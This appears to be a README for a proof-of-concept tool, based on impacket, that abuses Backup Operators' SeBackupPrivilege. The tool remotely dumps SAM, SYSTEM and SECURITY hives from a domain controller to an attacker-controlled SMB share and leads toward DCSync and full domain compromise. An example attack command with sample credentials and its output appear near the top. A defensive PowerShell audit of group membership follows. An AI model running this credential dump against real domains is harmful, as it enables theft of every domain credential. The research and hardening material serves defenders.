Backup Operator Registry Backup to Domain Compromise

A simple POC that abuses the SeBackupPrivilege held by members of Backup Operators to remotely dump the SAM, SYSTEM, and SECURITY registry hives from a target over the Remote Registry RPC interface. Run against a domain controller, the dumped SECURITY hive (decrypted with the boot key from SYSTEM) exposes the DC's own machine account secret from LSA, which is enough to DCSync every hash in the domain. That is the jump from "can back up files" to domain compromise.

Research credit to:


This proof of concept is a modified version of impacket/examples/ and works with the most recent impacket release installed. Every authentication mechanism impacket supports (plaintext password, NT hash, Kerberos ticket, AES key) works. The -p argument is the UNC path the hives are written to: the write is performed by the target's Remote Registry service, running as SYSTEM on the target, so the share must be reachable from the target and writable by its machine account (an anonymous-writable impacket smbserver share is the usual choice).

[email protected]:~# python3 jsmith:'Spring2021'@ backup -p '\\\share'
Impacket v0.9.25.dev1+20220208.122405.769c3196 - Copyright 2021 SecureAuth Corporation

Dumping SAM hive to \\\share\SAM
Dumping SYSTEM hive to \\\share\SYSTEM
Dumping SECURITY hive to \\\share\SECURITY



Treat the Backup Operators domain group as Tier 0, on the same footing as Domain Administrators: keep its membership empty or strictly controlled, review it with the same scrutiny as Domain Admins, and alert on any change to it. Membership in this group is a direct path to every credential in the domain.
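The following is an added audit check, not code from the POC or its author: it enumerates everything that ends up in the domain's BUILTIN\Backup Operators group, directly or through nesting, and reports the fields you would look at when reviewing Domain Admins. It assumes the ActiveDirectory RSAT module on a domain-joined host; the group is located by its well-known SID rather than by name so a renamed group is still found. The function name and output columns are this example's own choices.

```powershell
# Added audit check, not part of the POC: list every principal that ends up in
# BUILTIN\Backup Operators (directly or via nesting) with the fields used when
# reviewing a Tier 0 group. Requires the ActiveDirectory RSAT module.
Import-Module ActiveDirectory

function Get-BackupOperatorsMembership {
    [CmdletBinding()]
    param(
        # Domain controller to query; defaults to the domain's PDC emulator.
        [string]$Server = (Get-ADDomain).PDCEmulator
    )

    # S-1-5-32-551 is the well-known SID of BUILTIN\Backup Operators; resolving
    # by SID rather than display name survives a renamed group.
    $group = Get-ADGroup -Identity 'S-1-5-32-551' -Server $Server

    # Recursive expansion: a user nested several groups deep still receives
    # SeBackupPrivilege when logging on to a DC.
    $members = @(Get-ADGroupMember -Identity $group.DistinguishedName -Recursive -Server $Server)

    if ($members.Count -eq 0) {
        Write-Host "Backup Operators is empty on $Server (the expected Tier 0 state)"
        return
    }

    foreach ($m in $members) {
        $o = Get-ADObject -Identity $m.DistinguishedName -Server $Server `
                -Properties userAccountControl, lastLogonTimestamp, adminCount, servicePrincipalName

        # ADS_UF_ACCOUNTDISABLE is bit 0x2 of userAccountControl.
        $disabled = [bool]($o.userAccountControl -band 0x2)
        $lastLogon = if ($o.lastLogonTimestamp) { [DateTime]::FromFileTime($o.lastLogonTimestamp) } else { $null }

        [pscustomobject]@{
            SamAccountName = $m.SamAccountName
            ObjectClass    = $m.objectClass
            Disabled       = $disabled
            LastLogon      = $lastLogon
            # Backup Operators is AdminSDHolder-protected; adminCount=1 means the
            # protection has been applied. A member without it is worth a look.
            AdminCountSet  = ($o.adminCount -eq 1)
            # A service account with an SPN in this group is a Kerberoast target
            # whose cracked password is a Tier 0 credential.
            HasSPN         = [bool]$o.servicePrincipalName
        }
    }
}

# Usage: review the output exactly as you would for Domain Admins.
Get-BackupOperatorsMembership | Format-Table -AutoSize
```

Any enabled account in the output, and especially a service account with an SPN, should be treated as holding Domain Admin-equivalent access until it is removed from the group.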


